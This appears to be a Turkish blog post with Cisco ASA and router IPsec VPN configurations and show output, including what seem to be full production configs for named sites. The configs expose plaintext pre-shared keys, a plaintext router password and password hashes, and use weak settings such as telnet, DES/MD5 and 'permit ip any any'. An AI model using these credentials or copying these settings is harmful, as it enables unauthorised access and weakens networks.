access-list LAN1_LAN2 extended permit ip host 192.168.1.1 host 192.168.2.2
local ident (addr/mask/prot/port): (192.168.1.1/255.255.255.255/0/0)
remote ident (addr/mask/prot/port): (192.168.2.2/255.255.255.255/0/0)
current_peer: 10.10.10.2
#pkts encaps: 4, #pkts encrypt: 4, #pkts digest: 4
#pkts decaps: 4, #pkts decrypt: 4, #pkts verify: 4
#pkts compressed: 0, #pkts decompressed: 0
#pkts not compressed: 4, #pkts comp failed: 0, #pkts decomp failed: 0
#pre-frag successes: 0, #pre-frag failures: 0, #fragments created: 0
#PMTUs sent: 0, #PMTUs rcvd: 0, #decapsulated frgs needing reassembly: 0
#TFC rcvd: 0, #TFC sent: 0
#Valid ICMP Errors rcvd: 0, #Invalid ICMP Errors rcvd: 0
#send errors: 0, #recv errors: 0
local crypto endpt.: 10.10.10.1/500, remote crypto endpt.: 10.10.10.2/500
path mtu 1500, ipsec overhead 74(44), media mtu 1500
PMTU time remaining (sec): 0, DF policy: copy-df
ICMP error validation: disabled, TFC packets: disabled
current outbound spi: FCD7E620
current inbound spi : 99589369
inbound esp sas:
spi: 0x99589369 (2572718953)
transform: esp-aes esp-sha-hmac no compression
in use settings ={L2L, Tunnel, IKEv2, }
slot: 0, conn_id: 4096, crypto-map: MY_CRYPTO_MAP
sa timing: remaining key lifetime (kB/sec): (4193279/28737)
IV size: 16 bytes
replay detection support: Y
Anti replay bitmap:
0x00000000 0x0000001F
outbound esp sas:
spi: 0xFCD7E620 (4242007584)
transform: esp-aes esp-sha-hmac no compression
in use settings ={L2L, Tunnel, IKEv2, }
slot: 0, conn_id: 4096, crypto-map: MY_CRYPTO_MAP
sa timing: remaining key lifetime (kB/sec): (3962879/28737)
IV size: 16 bytes
replay detection support: Y
Anti replay bitmap:
0x00000000 0x00000001
ASA TO Cisco Router IPSEC VPN
ASA:
int g0/0 no sh ip add 10.10.10.1 255.255.255.0 security-level 100 nameif inside int g0/1 no sh ip add 203.200.200.2 255.255.255.252 security-level 0 nameif outside route outside 0 0 203.200.200.1 crypto ikev1 policy 1 authentication pre-share encryption 3des hash sha group 2 lifetime 86400 crypto ipsec ikev1 transform-set MY_SET esp-3des esp-md5-hmac crypto map VPN 1 set security-association lifetime seconds 86400 crypto map VPN 1 set pfs object-group network Local network-object host 10.10.10.10 object-group network Remote network-object host 172.16.20.10 access-list ACL-PERMIT extended permit ip object-group Local object-group Remote tunnel-group 117.168.100.2 type ipsec-l2l tunnel-group 117.168.100.2 ipsec-attributes ikev1 pre-shared-key Cisco123 crypto map VPN 1 match address ACL-PERMIT crypto map VPN 1 set peer 117.168.100.2 crypto map VPN 1 set ikev1 transform-set MY_SET crypto map VPN interface outside crypto ikev1 enable outside #sh vpn-sessiondb detail l2l filter ipaddress 117.168.100.2
Cisco Router
int f0/0 no sh ip add 172.16.20.1 255.255.255.0 in f0/1 no sh ip add 117.168.100.2 255.255.255.252 ip route 0.0.0.0 0.0.0.0 117.168.100.1 crypto isakmp policy 1 authentication pre-share encryption 3des hash sha group 2 lifetime 86400 crypto ipsec transform-set MY-SET esp-3des esp-md5-hmac ip access-list extended ACL-PERMIT permit ip host 172.16.20.10 host 10.10.10.10 crypto isakmp key 0 Cisco123 address 203.200.200.2 crypto map VPN 1 ipsec-isakmp set peer 203.200.200.2 set transform-set MY-SET set pfs group2 set security-association lifetime seconds 86400 match address ACL-PERMIT interface FastEthernet0/1 crypto map VPN
#sh crypto session#sh vpn-sessiondb detail l2l filter ipaddress 117.168.100.2TUM KONFIGURASYONASAASA Version 9.5(2) ! hostname MES2-Tai-Firewall enable password M11Bxq0F5IM3c3hp encrypted passwd uoyK.nRXb41yBCX3 encrypted names ! interface GigabitEthernet0/0 nameif ViaSat security-level 1 ip address 10.51.22.2 255.255.255.252 ! interface GigabitEthernet0/1 shutdown no nameif no security-level no ip address ! interface GigabitEthernet0/2 shutdown no nameif no security-level no ip address ! interface GigabitEthernet0/3 shutdown no nameif no security-level no ip address ! interface GigabitEthernet0/4 shutdown no nameif no security-level no ip address ! interface GigabitEthernet0/5 shutdown nameif Deneme security-level 0 no ip address ! interface Management0/0 management-only nameif management security-level 100 ip address 192.168.1.1 255.255.255.0 ! interface GigabitEthernet1/0 channel-group 1 mode on no nameif no security-level no ip address ! interface GigabitEthernet1/1 channel-group 1 mode on no nameif no security-level no ip address ! interface GigabitEthernet1/2 shutdown no nameif no security-level no ip address ! interface GigabitEthernet1/3 shutdown no nameif no security-level no ip address ! interface GigabitEthernet1/4 shutdown no nameif no security-level no ip address ! interface GigabitEthernet1/5 shutdown no nameif no security-level no ip address ! interface Port-channel1 lacp max-bundle 8 nameif YSHA security-level 1 ip address 10.51.100.31 255.255.255.0 ! boot system disk0:/asa952-smp-k8.bin ftp mode passive same-security-traffic permit inter-interface same-security-traffic permit intra-interface object network HA_6 subnet 10.60.6.0 255.255.255.0 description HA_6 object network HA_2 subnet 10.60.2.0 255.255.255.0 description HA_2 object network HA_3 subnet 10.60.3.0 255.255.255.0 description HA_3 object network HA_5 subnet 10.60.5.0 255.255.255.0 description HA_5 object network HA_7 subnet 10.60.7.0 255.255.255.0 description HA_7 object network HA_4 subnet 10.60.4.0 255.255.255.0 description HA_4 object network HA_1 subnet 10.60.1.0 255.255.255.0 description HA_1 object network HA_8 subnet 10.60.8.0 255.255.255.0 description HA_8 object network HA_9 subnet 10.60.9.0 255.255.255.0 description HA_9 object network HA_10 subnet 10.60.10.0 255.255.255.0 description HA_10 object network YKI-1 subnet 10.51.1.0 255.255.255.0 object network HA-11 subnet 10.60.11.0 255.255.255.0 description HA-11 access-list global_access extended permit ip any any access-list ViaSat_cryptomap extended permit ip object YKI-1 object HA_2 access-list ViaSat_cryptomap_2 extended permit ip object YKI-1 object HA_5 access-list ViaSat_cryptomap_1 extended permit ip object YKI-1 object HA_3 access-list ViaSat_cryptomap_3 extended permit ip object YKI-1 object HA_6 access-list ViaSat_cryptomap_4 extended permit ip object YKI-1 object HA_7 access-list ViaSat_cryptomap_5 extended permit ip object YKI-1 object HA_4 access-list ViaSat_cryptomap_7 extended permit ip object YKI-1 object HA_8 access-list ViaSat_cryptomap_6 extended permit ip object YKI-1 object HA_1 access-list ViaSat_cryptomap_9 extended permit ip object YKI-1 object HA_10 access-list ViaSat_cryptomap_10 extended permit ip object YKI-1 object HA_9 access-list Deneme_cryptomap extended permit ip object YKI-1 object HA-11 pager lines 24 logging asdm informational mtu ViaSat 1500 mtu Deneme 1500 mtu management 1500 mtu YSHA 1500 icmp unreachable rate-limit 1 burst-size 1 asdm image disk0:/asdm-762.bin no asdm history enable arp timeout 14400 no arp permit-nonconnected access-group global_access global route ViaSat 10.1.3.0 255.255.255.0 10.51.22.1 1 route ViaSat 10.50.250.0 255.255.255.0 10.51.22.1 1 route YSHA 10.51.1.0 255.255.255.0 10.51.100.11 1 route ViaSat 10.60.0.0 255.255.0.0 10.51.22.1 1 timeout xlate 3:00:00 timeout pat-xlate 0:00:30 timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 sctp 0:02:00 icmp 0:00:02 timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00 timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00 timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute timeout tcp-proxy-reassembly 0:01:00 timeout floating-conn 0:00:00 user-identity default-domain LOCAL aaa authentication ssh console LOCAL aaa authentication telnet console LOCAL http server enable http 192.168.1.0 255.255.255.0 management http 10.51.2.0 255.255.255.0 YSHA http 10.51.1.0 255.255.255.0 YSHA http 10.51.4.0 255.255.255.0 YSHA no snmp-server location no snmp-server contact crypto ipsec ikev1 transform-set ESP-AES-128-SHA esp-aes esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-128-MD5 esp-aes esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-192-SHA esp-aes-192 esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-128-SHA-TRANS esp-aes esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-128-SHA-TRANS mode transport crypto ipsec ikev1 transform-set ESP-AES-128-MD5-TRANS esp-aes esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-128-MD5-TRANS mode transport crypto ipsec ikev1 transform-set ESP-AES-192-SHA-TRANS esp-aes-192 esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-192-SHA-TRANS mode transport crypto ipsec ikev1 transform-set ESP-AES-192-MD5-TRANS esp-aes-192 esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-192-MD5-TRANS mode transport crypto ipsec ikev1 transform-set ESP-AES-256-SHA-TRANS esp-aes-256 esp-sha-hmac crypto ipsec ikev1 transform-set ESP-AES-256-SHA-TRANS mode transport crypto ipsec ikev1 transform-set ESP-AES-256-MD5-TRANS esp-aes-256 esp-md5-hmac crypto ipsec ikev1 transform-set ESP-AES-256-MD5-TRANS mode transport crypto ipsec ikev1 transform-set ESP-3DES-SHA esp-3des esp-sha-hmac crypto ipsec ikev1 transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac crypto ipsec ikev1 transform-set ESP-3DES-SHA-TRANS esp-3des esp-sha-hmac crypto ipsec ikev1 transform-set ESP-3DES-SHA-TRANS mode transport crypto ipsec ikev1 transform-set ESP-3DES-MD5-TRANS esp-3des esp-md5-hmac crypto ipsec ikev1 transform-set ESP-3DES-MD5-TRANS mode transport crypto ipsec ikev1 transform-set ESP-DES-SHA esp-des esp-sha-hmac crypto ipsec ikev1 transform-set ESP-DES-MD5 esp-des esp-md5-hmac crypto ipsec ikev1 transform-set ESP-DES-SHA-TRANS esp-des esp-sha-hmac crypto ipsec ikev1 transform-set ESP-DES-SHA-TRANS mode transport crypto ipsec ikev1 transform-set ESP-DES-MD5-TRANS esp-des esp-md5-hmac crypto ipsec ikev1 transform-set ESP-DES-MD5-TRANS mode transport crypto ipsec security-association pmtu-aging infinite crypto map ViaSat_map0 1 match address ViaSat_cryptomap crypto map ViaSat_map0 1 set peer 10.50.250.11 crypto map ViaSat_map0 1 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 2 match address ViaSat_cryptomap_2 crypto map ViaSat_map0 2 set peer 10.50.250.35 crypto map ViaSat_map0 2 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 3 match address ViaSat_cryptomap_1 crypto map ViaSat_map0 3 set peer 10.50.250.19 crypto map ViaSat_map0 3 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 4 match address ViaSat_cryptomap_3 crypto map ViaSat_map0 4 set peer 10.50.250.43 crypto map ViaSat_map0 4 set ikev1 transform-set ESP-AES-256-SHA ESP-AES-256-MD5 crypto map ViaSat_map0 5 match address ViaSat_cryptomap_4 crypto map ViaSat_map0 5 set peer 10.50.250.51 crypto map ViaSat_map0 5 set ikev1 transform-set ESP-AES-256-SHA ESP-AES-256-MD5 crypto map ViaSat_map0 6 match address ViaSat_cryptomap_5 crypto map ViaSat_map0 6 set peer 10.50.250.27 crypto map ViaSat_map0 6 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 7 match address ViaSat_cryptomap_6 crypto map ViaSat_map0 7 set peer 10.50.250.3 crypto map ViaSat_map0 7 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 8 match address ViaSat_cryptomap_7 crypto map ViaSat_map0 8 set peer 10.50.250.59 crypto map ViaSat_map0 8 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 9 match address ViaSat_cryptomap_10 crypto map ViaSat_map0 9 set peer 10.50.250.67 crypto map ViaSat_map0 9 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 10 match address ViaSat_cryptomap_9 crypto map ViaSat_map0 10 set peer 10.50.250.75 crypto map ViaSat_map0 10 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map ViaSat_map0 interface ViaSat crypto map Deneme_map0 1 match address Deneme_cryptomap crypto map Deneme_map0 1 set peer 10.50.250.83 crypto map Deneme_map0 1 set ikev1 transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5 crypto map Deneme_map0 interface Deneme crypto ca trustpoint ASDM_TrustPoint0 enrollment terminal subject-name CN=MES2-Tai-Firewall no ca-check crl configure crypto ca trustpool policy crypto ikev1 enable ViaSat crypto ikev1 policy 20 authentication rsa-sig encryption aes-256 hash sha group 2 lifetime 86400 crypto ikev1 policy 30 authentication pre-share encryption aes-256 hash sha group 2 lifetime 86400 crypto ikev1 policy 50 authentication rsa-sig encryption aes-192 hash sha group 2 lifetime 86400 crypto ikev1 policy 60 authentication pre-share encryption aes-192 hash sha group 2 lifetime 86400 crypto ikev1 policy 80 authentication rsa-sig encryption aes hash sha group 2 lifetime 86400 crypto ikev1 policy 90 authentication pre-share encryption aes hash sha group 2 lifetime 86400 crypto ikev1 policy 110 authentication rsa-sig encryption 3des hash sha group 2 lifetime 86400 crypto ikev1 policy 120 authentication pre-share encryption 3des hash sha group 2 lifetime 86400 crypto ikev1 policy 140 authentication rsa-sig encryption des hash sha group 2 lifetime 86400 crypto ikev1 policy 150 authentication pre-share encryption des hash sha group 2 lifetime 86400 telnet 192.168.1.0 255.255.255.0 management telnet 10.51.1.0 255.255.255.0 YSHA telnet timeout 5 no ssh stricthostkeycheck ssh 10.51.1.0 255.255.255.255 YSHA ssh timeout 5 ssh key-exchange group dh-group1-sha1 console timeout 0 management-access YSHA dhcpd address 192.168.1.2-192.168.1.254 management dhcpd enable management ! threat-detection basic-threat threat-detection statistics access-list no threat-detection statistics tcp-intercept ssl cipher default custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA" ssl cipher tlsv1 custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA" ssl cipher dtlsv1 custom "RC4-SHA:AES128-SHA:AES256-SHA:DES-CBC3-SHA" group-policy GroupPolicy9 internal group-policy GroupPolicy9 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy8 internal group-policy GroupPolicy8 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy7 internal group-policy GroupPolicy7 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy6 internal group-policy GroupPolicy6 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy5 internal group-policy GroupPolicy5 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy4 internal group-policy GroupPolicy4 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy3 internal group-policy GroupPolicy3 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy2 internal group-policy GroupPolicy2 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy1 internal group-policy GroupPolicy1 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy11 internal group-policy GroupPolicy11 attributes vpn-tunnel-protocol ikev1 group-policy GroupPolicy10 internal group-policy GroupPolicy10 attributes vpn-tunnel-protocol ikev1 dynamic-access-policy-record DfltAccessPolicy username test password P4ttSyrm33SV8TYp encrypted privilege 15 username R1220 password 3.nSPNWoajd03dK4 encrypted username erkan password g7yfRcqBFwlZb3Dd encrypted privilege 15 tunnel-group 10.50.250.11 type ipsec-l2l tunnel-group 10.50.250.11 general-attributes default-group-policy GroupPolicy1 tunnel-group 10.50.250.11 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.35 type ipsec-l2l tunnel-group 10.50.250.35 general-attributes default-group-policy GroupPolicy2 tunnel-group 10.50.250.35 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.19 type ipsec-l2l tunnel-group 10.50.250.19 general-attributes default-group-policy GroupPolicy3 tunnel-group 10.50.250.19 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.43 type ipsec-l2l tunnel-group 10.50.250.43 general-attributes default-group-policy GroupPolicy4 tunnel-group 10.50.250.43 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.51 type ipsec-l2l tunnel-group 10.50.250.51 general-attributes default-group-policy GroupPolicy5 tunnel-group 10.50.250.51 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.27 type ipsec-l2l tunnel-group 10.50.250.27 general-attributes default-group-policy GroupPolicy6 tunnel-group 10.50.250.27 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.3 type ipsec-l2l tunnel-group 10.50.250.3 general-attributes default-group-policy GroupPolicy7 tunnel-group 10.50.250.3 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.59 type ipsec-l2l tunnel-group 10.50.250.59 general-attributes default-group-policy GroupPolicy8 tunnel-group 10.50.250.59 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.67 type ipsec-l2l tunnel-group 10.50.250.67 general-attributes default-group-policy GroupPolicy9 tunnel-group 10.50.250.67 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.75 type ipsec-l2l tunnel-group 10.50.250.75 general-attributes default-group-policy GroupPolicy10 tunnel-group 10.50.250.75 ipsec-attributes ikev1 pre-shared-key ***** tunnel-group 10.50.250.83 type ipsec-l2l tunnel-group 10.50.250.83 general-attributes default-group-policy GroupPolicy11 tunnel-group 10.50.250.83 ipsec-attributes ikev1 pre-shared-key ***** ! class-map inspection_default match default-inspection-traffic ! ! policy-map type inspect dns preset_dns_map parameters message-length maximum client auto message-length maximum 512 policy-map global_policy class inspection_default inspect dns preset_dns_map inspect ftp inspect h323 h225 inspect h323 ras inspect rsh inspect rtsp inspect esmtp inspect sqlnet inspect skinny inspect sunrpc inspect xdmcp inspect sip inspect netbios inspect tftp inspect ip-options ! service-policy global_policy globalROUTERhostname Router ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! ! ! ip auth-proxy max-login-attempts 5 ip admission max-login-attempts 5 ! ! ! ! ! ip cef no ipv6 cef ! multilink bundle-name authenticated ! ! ! ! ! ! ! ! username R1220 privilege 15 password 0 Ta14551748 ! ! ! ! ! ! ! ! crypto isakmp policy 1 encr aes 256 authentication pre-share group 2 crypto isakmp key Frr550Mrn address 10.51.22.2 crypto isakmp key Frr550Mrn address 10.51.21.2 crypto isakmp key Frr550Mrn address 10.51.23.2 crypto isakmp key Frr550Mrn address 10.52.21.2 crypto isakmp key Frr550Mrn address 10.52.22.2 crypto isakmp key Frr550Mrn address 10.49.21.3 crypto isakmp keepalive 10 ! ! crypto ipsec transform-set ANKA esp-aes 256 esp-sha-hmac ! ! ! crypto map IPSEC 1 ipsec-isakmp description Batman set peer 10.51.21.2 set peer 10.51.23.2 set transform-set ANKA match address 101 crypto map IPSEC 2 ipsec-isakmp description Adana set peer 10.52.21.2 set peer 10.52.22.2 set transform-set ANKA match address 102 crypto map IPSEC 3 ipsec-isakmp description OSEM set peer 10.49.21.3 set transform-set ANKA match address 103 crypto map IPSEC 4 ipsec-isakmp description Sivrihisar set peer 10.51.22.2 set transform-set ANKA match address 104 ! ! ! ! interface FastEthernet0/0 description HAU ip address 10.60.10.1 255.255.255.0 duplex auto speed auto ! interface FastEthernet0/1 description UKB-2 ip address 10.61.1.1 255.255.255.0 duplex auto speed auto ! interface FastEthernet0/2 description VMBR no ip address ! interface FastEthernet0/3 description ACU no ip address ! interface FastEthernet0/4 description UKB-1 no ip address ! interface Vlan1 ip address 10.50.250.75 255.255.255.248 crypto map IPSEC ! ip forward-protocol nd ! ! no ip http server no ip http secure-server ip route 0.0.0.0 0.0.0.0 10.50.250.73 ! access-list 101 deny ip 10.60.10.0 0.0.0.255 10.50.250.0 0.0.0.255 access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.3.0 0.0.0.255 access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.4.0 0.0.0.255 access-list 101 permit ip 10.60.10.0 0.0.0.255 10.51.5.0 0.0.0.255 access-list 102 permit ip 10.60.10.0 0.0.0.255 10.52.0.0 0.0.255.255 access-list 103 deny ip any 10.50.250.0 0.0.0.255 access-list 103 permit ip 10.60.10.0 0.0.0.255 10.50.0.0 0.0.255.255 access-list 104 permit ip 10.60.10.0 0.0.0.255 10.51.100.0 0.0.0.255 ! ! ! control-plane ! ! ! ! ! ! line con 0 line aux 0 line vty 0 4 login transport input all ! ! end
Hiç yorum yok:
Yorum Gönder